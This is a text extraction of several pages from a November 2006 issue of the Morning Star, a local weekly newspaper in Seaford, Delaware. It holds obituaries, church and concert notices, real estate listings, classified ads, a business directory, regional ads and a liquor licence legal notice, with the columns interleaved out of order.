2, 1929 in Rochester, N.Y., a daughter of Walter E. Lambe and Olive G. Little Lambe. She retired from Black & Decker after 27 years of service. She worked in the kitchen at Caroline Nursing Home in Denton for four years and also worked for the Caroline County Board of Education for 10 years as a school bus driver. She was a member of A.A.R.P. and the Widowed Persons Service that met in Seaford. Besides her parents, she was preceded in death by her husband, Jack Rouse on March 6, 1993. She was also preceded in death by three sons, James Robin Rouse, Donald W. Rouse, Roy W. Rouse; a sister, 2 North Laws St., Bridgeville, DE 19933 Across from Bank 337-7409 Handicap Friendly WORSHIP TIMES: 9 am Contemporary Service 10 am Sunday School 11 am Traditional Worship Youth Group (Sun. 6 p.m.) Delphine Ann Page, 75 Delphine Ann Page of Greenwood, passed away on Saturday, Nov.18, 2006 at her residence. She was born on July 25, 1931 in Lebanon, DE to the late Delphin and Wilhemina Daisey. She is survived by her husband of 48 years, Richard Allen Page of Greenwood; three sons, Frederick Donophan of Cumberland, Md, Bruce Donophan of Pennsyl- He is survived by two sons and their wives, Keith and Pat Connolley, Seaford, and Tom and Mary Connolley, Greencastle, PA; two daughters, Linda Simmons and her husband Roger of Gaffney, SC and Penny C. Connolley, Lewes; a brother, Charles Connolley of Warren, RI; two sisters, Ellen Stant Lazzeri, Camden, and Henrietta Maloney, Milford; 11 granddaughters and one grandson; 15 greatgrandchildren; his extended family, which includes in-laws Edith and Chuck Benton, Palm Springs, CA; Frances and Jim Shields, of Delray Beach FL; and Janice Bramble of Millington, MD. In addition to his parents, he was preceeded in death by his loving wife Erma Bramble Connolley whom he met at Heavens Gate on November 18; a grandson and a granddaughter; six brothers and six sisters. Services were Wednesday, Nov. 22, in Our Lady of Lourdes Roman Catholic Church, Stein Highway, Seaford, with a commital service in Lewes Presbyterian Church Yard. Contributions may be made to Ches-Del Bays Chapter 64, 405 Ivory Lane, Newark, DE 19702. ✳ NOVEMBER 23 - 29, 2006 vania, Richard A. Page; four daughters, Regena Bordley of Greenwood, Tracy Murray of Greenwood, Deborah Page of Salisbury, Md, Deaneen Page of Grasonville, Md; four grandchildren; one great granddaughter. Funeral Services will be held at the Parsell Funeral Homes & Crematorium, Hardesty Chapel, 202 Laws Street, Bridgeville on Friday, Nov. 24, 2006 at 2 p.m. Burial will follow the services at Bridgeville Cemetery. Memorials can be made to Delaware Hospice 20167 Office Circle Georgetown, DE 19947-online condolences may be sent to condolences@parsellfuneralhomes.com. Doris Yvonne McQuay, 83 Doris Yvonne McQuay passed away at Coastal Hospice by the Lake in Salisbury on Saturday, November 18, 2006. She was born in Bozman, Maryland, a daughter of Daniel Seth McQuay and Helen Graff Fedder. Doris was a Major with the Salvation Army. Major McQuay was commissioned from The Salvation Army Training College in Atlanta, Georgia in May 1953. She then had a short appointment to the Mountain Mission in North Carolina. She also had been stationed in The Salvation Army’s Homes and Hospitals for Unwed Mothers in Birmingham, Tulsa, Tampa, Louisville and Richmond. She served at The Salvation Army Day Care Center in Baltimore and was the director of the Girl’s Club in WinstonSalem, North Carolina from 1973 until her retirement in 1985. Major McQuay was a Christian comic and traveled to many Salvation Army senior camps throughout the eastern United States after her retirement PAGE 29 and appeared many times on a local Salisbury television station. She was The Salvation Army’s Woman of the Year for the Salisbury area in 2005. She attended The Salvation Army Corp in Salisbury, Maryland. She is survived by her sister, Katherine Ziegelheafer of Delmar; a brother, Gordon Reuben McQuay of Baltimore; and several nieces, nephews and cousins. She was preceeded in death by a brother, Leroy Seth McQuay. A viewing was held at Duda-Ruck Funeral Home of Dundalk on Tuesday. The funeral service was at the funeral home on Wednesday. Major Keath Biggers and Major Gene Hogg officiated. Interment followed at Gardens of Faith in Baltimore. Memorial contributions may be sent to The Salvation Army, P.O. Box 3235, Salisbury, MD 21802. What must I do to be saved? CHURCH BULLETINS Continued from page 27 pastored there for 13 years. In July 2006, Pastor Tim began his tenure at Central Worship Center (formerly Epworth Fellowship Church) in Laurel. He, indeed, has come back full circle. He and his wife, Dottie live in Ocean Pines and have four children. The singer will be Corey Franklin. Corey pursued music when he was at a very young age. It wasn’t long before he began song writing and he has been making music a priority ever since. Corey joined the high school choir his junior year, became interested in vocal training, and gained an appreciation for vocal and music theory. He enjoyed much success and received several high honors such as the national chorale men’s choir division in 1995. Corey is now booking and playing live shows. Currently, he is the Worship Leader at Central Worship Center in Laurel. Corey and his wife, Michele, live in Laurel and have three children. Come and receive a blessing. Reservations are necessary. Deadline is Nov. 29. For details or more information call: Joyce Thomas at 629-2248, Michele Thompson at 877-0797, or Arvalene Moore at 8754387. Church of God Concert Jerry Jones will present a Christmas Concert at Stein Highway Church of God, 500 Arch St., Seaford, Friday evening, Dec. 8, at 7 p.m. He will share in word Help a lonely senior through the Be a Santa to a Senior Program Home Instead Senior Care, provider of non-medical home care and companionship for older adults, will hold the third annual Be a Santa to a Senior program now through Dec. 4. The program is designed to help stimulate human contact and social interaction for seniors who are unlikely to have guests during the holidays. Participating local non-profit organizations identify needy, orphaned and isolated seniors in the community and provide those names to Home Instead Senior Care for the program. Christmas trees in The Dover Mall and at each Halpern Eye location feature ornaments with the first names only of needy. A citywide gift-wrapping day will be held on Dec. 8 at Westminster Village in Dover at noon and Dec. 9 at Genesis/Seaford Center in Seaford at noon. The following local organizations have joined the program in Kent County - Green Meadows, State Street Assisted Living, Courtland Manor, Home Health Corporation of America, Compassionate Care Hospice, Capital Healthcare and Rehabilitation Services and Westminster Village. In Sussex County, the organizations include Nanticoke Senior Center, Harrison House, Lewes Senior Center, Delaware Hospice, The Greater Seaford Chamber of Commerce and Easter Seals. Also participating are The Dover Mall, and all Halpern Eye locations. Helen, 81, is one area senior who benefited from the program last year. She received gloves, a hat and a scarf that requested and was delighted to have visitors during the holidays. If you or someone you know is interested in volunteering to help on the citywide gift-wrapping day, contact Nancy Bork or Valerie Crew at 302-697-6435. Businesses are encouraged to contact the local Home Instead Senior Care office about adopting groups of seniors. and song with Traditional Christmas music, Country Gospel Music, and Contemporary Gospel Music. All are invited. A love offering will be accepted. For more information call 6299689 or 629-8583.. Each week Mary Ann Young sings your Gospel favorite. November guest singers are: Nov. 25: Hannah Smith, Abundant Joy. Everyone is invited to attend. Come as you are. For more information, contact the church office at 875-3983, or Bruce Willey at 875-5539. Send us your Church news Send items to Morning Star, PO Box 1000, Seaford, DE 19973 or email morningstarpub@ddmg.net Laurel Wesleyan Church Presents A Heavenly Children’s Christmas Musical FEAR NOT factor Saturday, Dec. 2 nd at 6:00 pm and ... Sunday, Dec. 3 rd at 9:00 am & 11:00 am Located 1/2 mile north of Laurel on Alt 13 in Laurel, DE For more information contact the office at 875-5380 PAGE 30 MORNING STAR ✳ NOVEMBER 23 - 29, 2006 “Your Satisfaction is Our Goal” Entertainment P.O. Box 598-US 13 Seaford, DE 19973 Fax: 302-629-5573 LICENSED IN DELAWARE & MARYLAND 302-629-5575 800-221-5575 Thanksgiving Greetings With best wishes to all our neighbors, associates, customers and friends. Thank you for giving us so much to celebrate this year. NEW BAY STREET BRASSWORKS IN CONCERT - The Seaford Community Concert Association will be presenting its second concert of the season with Bay Street Brassworks. The group consists of French horn, tuba and two trumpets. Among numerous awards, they received first prize at the 2003 New York Brass Conference, Brass Quintet and two Career Development Grants from the Peabody Conservatory. The concert is on Tuesday, Nov. 28, at 8 p.m., at the Seaford High School. The concert series has been sold out for this year, and admission is by membership only. Mid-Atlantic Symphony Orchestra to celebrate the 2006 holiday season Mark your calendars! During the first weekend of December, the Mid-Atlantic Symphony Orchestra (MSO) will celebrate the beginning of the holiday season with a concert of "Holiday Joy" featuring Robert Cantrell, bass/baritone guest soloist. He has been described by the late Washington Post critic Joseph McLellan as "a warm supple voice that brought out the lyrical intentions of the composers making them treasured moments". Cantrell has appeared with the Washington Opera Company as "Jim" in Gershwin's "Porgy and Bess" and as the "Jailer" in Puccini's "Tosca." He has also performed with several other opera companies, including Baltimore Opera Company, Wolftrap Opera, and Opera Delaware. Following a performance of Verdi's Requiem, a Baltimore Sun critic wrote "Cantrell's ripe bass filled his solos vividly." In January 2007 he will be making his debut at Carnegie Hall as bass soloist in Mozart's "Requiem." MSO Music Director Julien Benichou has chosen a rich full program certain to delight the audience. Along with traditional carols, such as "Joy to the World" and "The First Noel," there are other holiday favorites including Leroy Anderson's "Sleigh Ride." The program also features excerpts from Handel's "Messiah," Nutcracker Suite No.1, and a Hanukkah medley. The concert will take place in three locations: Friday, Dec. 1, 7:30 p.m. at Sts. Peter & Paul Catholic Church on Rte. 50 & Easton Parkway, Easton, Md.; Saturday, Dec. 2, 7:30 p.m. at the Community Church on Rte. 589 in Ocean Pines/Berlin, Md.; and on Sunday, Dec. 3, 3 p.m. at Mariners Bethel Church, Route 26 & Central Avenue, Ocean View, Delaware. Advance tickets may be obtained by calling (888) 846-8600. Tickets are $28 for adults, $10 for students, and children 12 and under are free when accompanied by a paying adult. A printable order form is also available at. This concert is sponsored in part by grants from the Endowment for the Arts, the Maryland State Arts Council, Talbot County Arts Council, Worcester County Arts Council, and by the generosity of loyal patrons. The MSO is very appreciative of their support. NEW Good sized rancher appears in excellent shape. 4 BR, 2.5 BA, sunroom, fenced yard, hdwd. flrs., etc. #542683 $235,900 A rare find!!! Waterfront home in exclusive Holly Shores. Reproduction “Deerfield” home sits on 1.83 ac. on the main channel of the Nanticoke w/dock. 3 BR, 2.5 BA, 3rd flr. study w/magnificent view of the Nanticoke, formal LR & DR, FR w/full bar, sunroom & bright sunny kitchen. Many recent updates. #542580 Virtual Tour Great poultry farm. 3 houses with 2 computerized. All have tunnel on 5.25 acres w/3 BR, 2 BA rancher & lots of outbldgs. $750,000 #530878 Immaculate in-town ranch home featuring hardwood flrs. w/private dining, landscaped & irrigated yard. 2nd floor is ready to expand. Cedar closet, lots of storage. #533978 Virtual Tour Just right with all the good stuff. Beautiful 4 BR 3.5 BA home w/bonus room & game room. Hardwood & tile in many areas, granite kitchen counter, WP tub, wall cabinets, marble windowsills, Energy Star certified. #541831 Need Space? Almost 2 ac. country lot w/custom ranch & extra 3-car detached gar. w/workshop. Home has many custom features & extra summer kitchen. #528167 Beautiful stately home w/gorgeous hdwd. flrs., unique dual stairway that meets at a landing. Spacious flr. plan w/ 2nd flr. balcony. Wraparound porch is a perfect place to relax. $157,000 #531584 This could be your new home. Likenew 2-yr old Cape on 1.59 ac. surrounded by woods & ready to move into. 2 BR, 2.5 BA & unfinished 2nd flr. w/elec., plumbing & C/A. Lots of amenities. #541582 Discover Bank CDs. ® We have your best interest at heart. At Discover Bank, we understand why your money matters. That’s why our CD accounts have features to help you make the most of it: • Competitive Rates — CD rates consistently exceed the national averages* • Flexibility — Terms range from 3 months to 5 years Discover Bank. where every customer is a neighbor. • Low Minimums — Deposit amounts start at $500 • Strength and Security — Discover Bank CDs are FDIC insured Discover Bank has been providing exceptional banking services to the community since 1911. Our friendly Banking Representatives are sure to help you find the financial services that are right for you. So stop in and open a CD account today, go online at MyDiSCoveRBank.CoM, or call us for more information at 1-888-765-6654. 502 E. MarkEt St. GrEEnwood, dE 19950 toll frEE 1-888-765-6654 MEMbEr fdic. a MorGan StanlEy coMpany. *according to cd rates reported in a recent survey of financial institutions by banxQuote.com MORNING STAR PAGE 32 ✳ NOVEMBER 23 - 29, 2006 Classifieds FREE CLASSIFIEDS* (For Personal Use Only) *Some exceptions such as homes for rent or sale Deadline: Monday, 3 p.m. Businesses: $4.50 per inch ($9.00 minimum) Boxed (Display) Ads: $6.30/inch Legals: $6.30 per inch LOST NOTICE LOST KITTEN, white except tail & spot on left ear, had blue collar. Dublin Hill Rd., Bridgeville area. 3377244 or 448-9930. 10/5 CHILDCARE SOLUTIONS GIVE-AWAY STUFFED ANIMALS, like new, free. 841-2409. 11/16 HARDWOOD FIREWOOD, you cut & haul. 855-5878. 10/12 KITTENS! Various colors, 5 mos. old, mostly males, free to good home. 8750964. 10/5 FREE HORSE MANURE, great for gardens & shrubbery. 337-3840. 9/7 HELP WANTED Victory Beverage, distributor of Red Bull Energy Drink, is looking for a hard working individual to join our sales team. Fax resume to 215-2444702 or email to jdaunoras @victorybeverage.com 11/16/4tc BUSINESS OPPORTUNITY FOR SALE School Bus Business In The Seaford School District Call 629-9793 or 745-8922 LOOKING TO PARTNER WITH 4 BEAUTY CONSULTANTS. If you have tried other cosmetic companies, only to be let down, we need to talk. Call 1-800211-1202 x 16387. Leave your name and phone & the best time to reach you. tnnc New Christian Home Day Care has openings for infants, toddlers, and preschoolers. Call Miss Marci at 875-4307. tnnc Enjoy the Star? Call 629-9788 YARD SALE GARAGE SALE Sat., 11/25, 7:30 - until. Christmas items, hosuewares, golf clubs. 26399 Bethel Concord Rd., Seaford, near 4 way stop. 11/23 WANTED! LOOKING FOR A SCOOP for tractor, size 3. 4226381, ask for Jerry. AUTOMOTIVE PAYING MORE THAN $35 / Month for AUTO INSURANCE? 1-877-621-1030 Credit Cards accepted. tnc Cheap • Cheap • Cheap AUTO INSURANCE? 1-877-621-1030 Credit Cards accepted. tnc ‘93 FORD THUNDERBIRD, front end damage, good motor, new tires, sell for parts. 875-3023. 11/23 RAILS off Ford Ranger for short bed, good cond., $50. 337-7494. 11/16 GAS MINI CHOPPER, holds up to 300 lbs., $350. Gas Scooter, holds up to 300 lbs., $250, like new. 875-9437. 11/9 UTILITY TRAILER, 2 axle, 5’x10’, enclosed. 1 yr. old, full of yard & garden tools, some antique. 875-9383. 11/9 ‘94 HONDA PRELUDE SI, doesn’t run, needs engine work, otherwise nice cond. BO. 410-754-5985 or email thorwor82@aol.com (photos on request). 11/2 ‘82 ELCAMINO SS P/U, 422-6381, ask for Jerry. 10/19 20’ AWNING $275. 6292226. 11/2 REESE CAMPER, 12,000 lb. weight distribution, hitch w/spring bars & friction sway control. $125. 3378962. 10/26 ANTIQUES/ COLLECTIBLES LENOX ENDANGERED Baby Animal Series. Wallaby Joey (kangaroo) & Panther cub, $35 ea. 628-5484. FOR SALE GOLF CLUBS, Dunlop Exceed, bag & cart, $100. 629-2226. 11/23 Hitchens Frame Shop Discount Land Rd., Laurel 302-875-7098 20% Off thru Christmas 40 Yrs Framing Experience “You name it we frame it” CHINA CABINET, walnut, glass & wood front w/open display area. Exc. cond., just in time for the holidays, $50. 875-0747. 11/23 QUEEN SLEEPER SOFA, good cond., blue embossed, $125. Dining Table, 4 chairs & 2 captains chairs, $125. 877-0646. BOATS HELP WANTED KAYAK 18’ w/Rudder, Kelvar Const., beautiful cond. w/all access. & more. Must see. Sacrifice $1600. 8759775. 10/12 The Woodbridge School District SALES POSITIONS JOHNNY JANOSIK’S New “World Of Furniture” Laurel & Dover, Delaware Locations WE WANT PEOPLE WHO: • Have sales experience, but not necessary • Have an interest in furniture • Have enthusiasm WE OFFER: • Paid training programs • Health insurance and 401K plan • Employee discount • Potential to earn $50K+ a year is seeking qualified individuals for the following positions: • Technology Coordinator @ District Office • Technology Specialist @ Elem. & Middle Schools • Part Time Clerk @ District Office • Long Term Substitute - Spanish • Full Time Kindergarten Paraprofessional @ Elem. School To review Qualifications go to preview list at Any interested individual must submit an application to: Heath B. Chasanov, Assistant Superintendent, Woodbridge School District, 16359 Sussex Highway, Bridgeville, DE 19933 or CLOSING DATE: December 1, 2006. Call Renee Collins or email your resume to info.box@johnnyjanosik.com Managers & Assistant Managers CAMPERS/ TRAILERS The Board of Education reserves the right to reject any or all applicants, re-advertise and/or withdraw the position. The Woodbridge School District does not discriminate in the employment or educational programs, services, or activities, based on race, sex, or handicap in accordance with State and Federal Laws. COLLEGE STUDENTS The Delaware State Police is taking applications for Cadets We’re looking for customer service oriented people with true people skills, who possess the ability to budget, market and manage busy restaurants in Dover, Seaford, Rehoboth DE & Salisbury MD. Positions offer paid training, paid vacation, health insurance, Incentive bonus plans, and complimentary meals. Pay commensurate with experience. Fax resumes and cover letters to 677-1606 or email Nancy@delawareihop.com. Work 12-15 hours per week - $9.33 per hour Requirements 18-21 years of age, US Citizen Enrolled in a Delaware College, Must possess a valid drivers license with one year driving experience Application Closing date 12-01-2006 FOR MORE INFORMATION CONTACT A RECRUITER AT Come hungry. Leave happy. © 2006 International House of Pancakes, Inc. (302) 739-5980 The D.S.P. is an Equal Opportunity /Affirmative Action Employer BUSINESS & SERVICE DIRECTORY A/C & HEATING ATTORNEYS AUTOMOTIVE SUSSEX HEATING & A/C AUTO ACCIDENT AND PERSONAL INJURY CLAIMS ALLEN BODY WORKS, INC. 302-745-0735 Service within 4 Hours Lowest Price in Sussex County Sales, Service, Installation Initial Consultation Free No Fee Unless You Recover Evening and Weekend Appointments FUQUA and YORI, P.A. 413 NORTH CENTRAL AVE. LAUREL, DE 19956 The Circle • Georgetown • 856-7777 302-875-3208 *Listing areas of practice does not represent official certification as a specialist in those areas. COMPUTER NEEDS CONCRETE CONSTRUCTION In-Home Computer Repair Specialist For All Your Computing Needs • DRIVEWAYS • GARAGES • SIDEWALKS • PATIOS Factory Specialist on Carrier, York, Bryant, Trane, Rheem & Goodman Heat Pumps - A/C - Furnaces Over 20 Yrs. Experience Licensed & Insured Computer Running Slow? ATTORNEYS AT LAW MR. CONCRETE 410-742-0134 Mark Donophan Virus, Spyware & Spam got you down? Call Paul DeWolf User Friendly Computer Service 302.629.9208 EMPLOYMENT Licensed & Insured Free Estimates FARM & HOME 1004 W. Stein Hwy.Nylon Capital Shopping Ctr., Seaford, DE Donald L. Short, Owner/Sales 328 N. DuPont Hwy., Millsboro, DE 19966 • Ponds • Mulch • Shrubs • Stones • Trees • Lawn & Gdn. Supplies Full Service Store: • Pet Food • Livestock Equip. • Flags • Wild Bird Seed & Feeders • Giftware • Rowe Pottery • Candles • Clothing 302-934-9450 U.S. 13 N., Seaford 302-629-9645 • 800-564-5050 IRRIGATION MATERIAL HANDLING R & L Irrigation Services Finish Site Work Complete Irrigation Systems Sod Laying & Seeding Exterior Lighting Ponds, Mulching, Concrete Pavers EASTERN LIFT TRUCK CO., INC. Materials Handling Equipment Industrial Trucks New - Used - Rental Parts & Service The power to amaze yourself.™ 216 LAURELTOWNE LAUREL, DEL. 302-875-4541 PHOTO COPIES Self Service Photo Copies 10¢ per pg 302-530-3376 Morning Star Publications 628 West Stein Highway Behind County Bank 302-629-9788 REAL ESTATE REMODELING SALES LAUREL REALTY . TILE AUCTIONEER • Personal Property • Real Estate • Antiques • Farm (302) Have Gavel Will Travel (302) 875-2970 236-0344 Cell Laurel, Delaware CONSTRUCTION Independently Owned & Operated 328 N. DuPont Hwy. Millsboro, DE 19966 301 Bay St., Suite 308 Easton, MD 21601 302-934-9450 410-819-6990 Dick Anderson 9308 Middleford Rd., Seaford, DE SALES “The Pole Building Specialists” 302-629-4281 Seaford, Delaware COSMETICS A complete line of salon quality cosmetics individually selected just for you. Ask about our custom blended foundations. Call for a FREE consultation Pole Buildings - Residential Garages Horse Barns - & Other Complete Celebrating Buildings 25 Years HOME IMPROVEMENT INTERNET Roofing, Siding, Decks, Window Replacement, New Homes, Home Improvements & Customizing Over 25 Years Experience 17792 Line Church Rd., Delmar, DE 19940 (302) 846-0372 (302) 236-2839 cell POWER WASHING “Dependable” Power Washing Services Residential & Commercial Free Estimates 302-841-3511 Owned & Operated by: Doug Lambert, USN Ret. Licensed & Insured SEAFOOD Increase Your Sales Call Rick, George, Pat or Carol To ADVERTISE! Jay Reaser 875-3099 Access, Design & Services 888-432-7965 / 28 Old Rudnick Lane, Dover, DE PRINTING For Your Business Needs Business Cards Letterheads, Etc. Call The Star 628 W. Stein Hwy. 629-9788 SEPTIC SERVICE GOO MAN OF DELMAR Septic Care Services TREE & LANDSCAPE SERVICE FOR ALL YOUR TILING NEEDS Kitchen & Bath Remodels Commercial • Industrial • Residential John Liammayty - Licensed & Insured 302-853-2442 Call For Appt. Open Tuesday thru Sunday MUSSER & ASSOCIATES, INC. t/a All Work Guaranteed Donald L. Short, Owner 1004 W. Stein Hwy.Nylon Capital Shopping Ctr., Seaford, DE Healthy Hair with a Healthy Glow Men - Women - Children 800-385-2062 • 302-628-2600 FREE ESTIMATES 302-629-4548 Healthy Hair Clinique MICHAEL A. LOWE, SR. Propane, Elec., Gas, Diesel 10254-1 Stone Creek Dr. Laurel, DE 19956 302-875-8961 • Fax 302-875-8966 RICHARD E. WILLIAMS Lee Collins BARBER/BEAUTY All work guaranteed Free Estimates M-F 8-5; Sat. 8-4 Full Service Nursery: 302-628-0767 AUCTIONEER A&K Enterprises & Hitchens Frame Shop ALT 13 at Bridge in Laurel Drop off your Holiday framing at A&K. We will have it for you! *20% off Thru December 24th DISHWASHER, apt. size, portable, 6 mo. old, $200. 877-0646. 11/23 COFFEE & END TABLE, exc. cond., $80. 410-8833462. 11/9 CHILD’S DOLL HOUSE, $300. 344-1246. 11/23 THOMPSON 50 CAL. blk. powder Hawkins style, $150 OBO. 337-3370. 11/9 PAGEANT DRESS, white, sz. 8, good cond., $15. 8755788. 11/16 HOT TUB, exc. cond., seats 4, orig. $3000. $300 OBO. 629-6189. 11/16 BRIDAL GOWN, $2000 new, size 8, high neck & mutton sleeves, 20 yrs. old, $300 OBO. 629-6189. 11/16 GO-CART, Yersdog, 2 seater, 6 hp, w/torque converter, exc. cond., $500. 875-9431 eves. 11/16 FOUTON, very good cond., $125. 875-9437. 11/9 PIANO, $150 OBO. 8587492. 11/9 NEW HARLEY HELMET, #1 logo, $75 firm. Harley Wedding Rings, $100 firm. 858-7492. 11/9 4-PC. LR SUITE, sofa, rocker, chair & coffee table, wood trim, blue floral, $75. Phillips color TV, 12”, $25. 877.0741. 11/9 MR. & MRS. SANTA CLAUS handmade figures, 13” - 15” tall, $5 ea. 8753935. 10/26 DOUBLE STROLLER, Stadium style (side by side), good shape, $50. 875-3099 after 1 pm. 10/19. 875-5513 GIRL’S HUFFY BIKE, nearly new! 18” w/lBarbie Bike Helmet, $35. 875-3099. ✳ NOVEMBER 23 - 29, 2006 KNEELING COMPUTER CHAIR for bad backs, $20. 846-2681. 11/2 TROYBILT YARD VACUUM, walk behind, chipper, shredder, 5.5 hp. $250. 629-3315. 11/2 WICKER SET, 4 pc., mint green, $75. 875-8840 before 8 pm. 11/2 DINING ROOM TABLE, birch, 44L, 42W, 2 end leaves, 44L, 42W, 2 end leaves, 6 chairs (2 captain), exc. cond.) $1200. 6295469. 11/2 HEADBOARD, Southwestern style Headboard, wood & wrought iron, $35. 8753099. 11/2 OIL DRUM & STAND, 275 gal., $25 for both. Solid wood microwave stand, shaped like a home comfort wood stove, $125. 8759610. 11/2 DVD MOVIES, horror, adventure, comedy, $3 ea. 628-1880. 10/26 HUNTING COAT, brand new, sz. 42. Pd. $50, will take $30. 846-3839. 10/26 MICROWAVE, SUNBEAM, small, white, $20. 875-3099 after 1 pm. 10/19. WINCESTER PUMP model 1300, 4 interchangeable barrels, scope, choke, $350. CVA Muzzle Loader, Hawkis, 50 caliber, side hammer, $100 OBO. Ask for Tony, 875-2454. 10/19 ANIMALS, ETC. Happy Jack Flea Beacon: Controls fleas in the home without toxic sprays. Results overnight! JAY DAVIS LAWN & GARDEN 8755943. 11/16/4tc 60 GAL FISH TANK w/ stand & access., $200. 8757643. 11/16 PEACOCKS, 1 Pr. for sale, $50/pair. 875-4952. 10/19 BORDER COLLIE PUPS, farm raised, registered, ready to go Oct. 15. $400 ea. 629-3964. 10/5 WANTED TO RENT SENIOR LADY seeking to rent 1 or 2 BR trailer in areas of Delmar, Laurel, or Millsboro, Del. Good housekeeper, on S.S. income, no pets or children. Can pay approx. $350 mo. Need by Dec. 1. Call 410334-2382 or 410-742-5230. 11/16 Log Home Dealers WANTED! Great Earning Potential Excellent Profits Protected Territory Lifetime Warranty American Made Honest Value Daniel Boone Log Homes Call 1-888-443-4140 Enjoy The Star? Subscribe! 629-9788 DISCLAIMER: be aware that Morning Star Publications has no control over the Regional ads. Some employment ads and business opportunity ads may not be what they seem to! Does Your Business Need SPECIAL REGIONAL ADS Automotive DONATE YOUR VEHICLE! UNITED BREAST CANCER FOUNDATION. A Woman Is Diagnosed Every Two Minutes! Free Annual Mammogram Fast, Free Towing, NonRunners Acceptable 1-888-468-5964. Autos Wanted DONATE YOUR CAR TO THE ORIGINAL 1-800Charity Cars! Full retail value deduction if we provide your car to a struggling family. Call 1-800-CHARITY (1-800-242-7489) Business Opportunity ALL CASH CANDY ROUTE. Do you earn $800 in a day? Your own local candy route. Includes 30 machines and candy. All for $9,995. 888753-3452 Business Services Lawyer - Michael Ryan DWI, Criminal, Divorce, Child Custody, Car Accidents, Workers Compensation, Name Change, Social Security Disability, Free Consultation. Avail. Eves./ Weekends. Please Call 301-805-4180 Employment Services Post Office Now Hiring. Avg Pay $20/hour or $57K annually including Federal Benefits and OT. Paid Training, Vacations. PT/FT. 1800-584-1775 USWA Ref # P1021 Help Wanted Become a Certified Heating/Air Conditioning, Refrigeration Tech in 30 days (EPA/OSHA certification). Offer Financial Aid/Job Placement Assist. M-Sunday 1-866-551-0278 #1 TRUCK DRIVING SCHOOL - Training for Swift & Werner. Dedicated Runs Available. Starting Salary $50,000+ Home Weekly! ** Also Hiring Experienced Drivers** 1-800-883-0171 A-53 Part -time, home based Internet business. Earn $500 -$1000 / month or more. Flexible hours. Training Pro- vided. No investment required. FREE details. Life Insurance & Sales Pros Huge Biz Oppty. $35K-$75K PT $100K+FT 1-800-8949693 AWESOME TRAVEL JOB!!! 18-23 guys / gals to travel USA with coed business group representing major Hip-Hop Rock & Roll, Fashion and Sport publications! Transportation furnished. 1888-890-2250 Help Wanted - Sales Sales / Sales Managers/ No-Fee Distributors. $9K Wk High / $100K Yr. $1 Million Yr./ Future, 2-3 Pre-Set Leads Daily-Overrides / Bonuses / Mgrs. Not Multi Level. 1-800-233-9978 Craftmatic Help Wanted-Drivers Drivers: ACT NOW! Early Christmas Bonus $1000+Wkly 36-43cpm / $1.20pm $0 Lease NEW Trucks CDL-A + 3 mos OTR 800-635-8669 Land For Sale HUNTER'S NY LAND SALE, LAST CHANCEAUCTIOIN PRICES. 50 Tracts-20 to 250 Acres. Discounts, rebates, free closing costs. Limited time. Steuben County/ Southern Tier- 5 Acres- $17,900. Borders state game lands- 10 cres- $19,900. Tug Hill/ Salmon River Area- 48 Acres- $59,900. Adirondack Hunt Club- 120 Acres-$580 per acre. Western Adirondacks with ponds & 175 Acres- $740 per acre. Our best deals in 10 years! EZ financing. Call Christmas & Associates, 800-229-7843, NYS' Only Company Participating with Cabela's Trophy Properties. 20+ Acres with Private River Access. Perfect for a vacation getaway and retirement. Very usable with long range mtn views. 8+ AC with 600' of Private Trout Stream. Frontage on paved state rd, open meadows, unsurpassed 180* views. Ready to fish or have horses. All for only A SHOT IN THE ARM? Place a business card-sized ad in 101 MD, DE & DC newspapers with just one phone call and for one low price! Reach 3.7 MILLION People! Get the Best Coverage! ONLY $1,250 PER INSERTION. For details, call Gay Fraustro of the MDDC Press Service at 410-721-4000 x17 SAVE UP TO 85% MDDC 2x2 DISPLAY AD NETWORK $148,728. Plus private deeded access to National Forest. New survey, perc. Special Holiday Financing! Call today 1-877-777-4837 FOR SALE BY OWNER. 1000' of seasonal stream, High elevation ridge w/ sunset views. Mixture of hardwoods/ pine. Easy access to camp or build. 22+ acres, perc, for only $131,500. Call 304-262-2770 LAND BARGAIN Gentle hardwood ridges, 2 seasonal stream. Enjoy sunrise views in this 20+ acre parcel w/ private deeded access to South Branch of Potomac River. Only $122,700. Call Now 304-596-6114 ONE OF A KIND 19+ ACRES. Park- like hardwoods with driveway & pristine sunset views. Over 1100' of Jefferson National Forest frontage. Fronting on paved state rd. New survey, perc, ready to use for only $157,123. Call Owner 1304-596-6115 Medical Supplies New power wheelchairs, scooters, hospital beds, ABSOLUTELY NO COST TO YOU If qualified. New lift chairs starting at $599, limited time offer. Toll free 1866-400-6844 Miscellaneous AIRLINES ARE HIRING Train for high paying Aviation Maintenance Career. FAA approved program. Financial aid if qualified - Job placement assistance. CALL Aviation Institute of Maintenance 1-888-3495387 Real Estate NORTH CAROLINA MOUNTAINS- Gated community with spectacular views, public water including fire hydrants, DSL accessibility, paved roads, nearby lakes; preselling phase IV $35,000+ 800463-9980 Coastal Georgia- New, PreConstruction Golf Community. Large lots & condos w/ deepwater, marsh, golf, nature views. Gated, Golf, Fitness Center, Tennis, Trails, Docks. $70k's-$300K. 1877-266-7376 MORNING STAR Real Estate Rentals NO RENT- $0 DOWN HOMES Gov't & Bank foreclosures! No Credit O.K. $0 to low Down! For Listings, (800)860-0573 Real Estate Services We Buy Houses... Fair price, fast settlement. Whatever the situation, Probate, Divorce, Death, etc. Roger 202-327-0196 Real Estate/Acreage Want to get your Business Booming?? Advertise in 120 newspapers across Maryland, Delaware, and DC, reach over 2.3 Million households for only $430. For more information contact this Newspaper or call Mike Hiesener, MDDC Classified Networks, 410721-4000, ext.19 or visit :. Tax Services IRS TAX DEBT KEEPING YOU AWAKE? Local CPA firm resolves all Federal and State tax problems for individuals and businesses. US Tax Resolutions, P.A. 877-477-1108. FREE CLASSIFIEDS Personal Items for Sale. No Vendors Please. Call 629-9788, or send to P.O. Box 1000, Seaford, DE 19973. Enjoy the Star? Don’t Miss It! Subscribe Today! Call 629-9788 302-875-3099 elegantyou.motivescosmetics.com LEGALS NOTICE OF APPLICATION “Castaways, Inc. T/A The Castaways have on November 13, 2006, applied with the Alcoholic Beverage Control (“Commissionerâ€?) seeking a 1,700 square foot extension of premise. Extension includes adding handicap-accessible restrooms, storage space and a 2,450 square foot outdoor patio. Licensee request variance(s) to allow external speakers or amplifiers, live entertainment and a wet bar on licensed patio. Premises located at 30739 Sussex Highway Laurel, DE. âœł NOVEMBER 23 - 29, 2006 Building, 820 North French Street, Wilmington, DE 19801. The protest(s) must be received by the Commissioner’s office on or before December 18, 2006. Failure to file such a protest may result in the Commissioner considering the application without further notice, input or hearing. If you have questions regarding this matter please contact the Commissioner’s Office.â€? 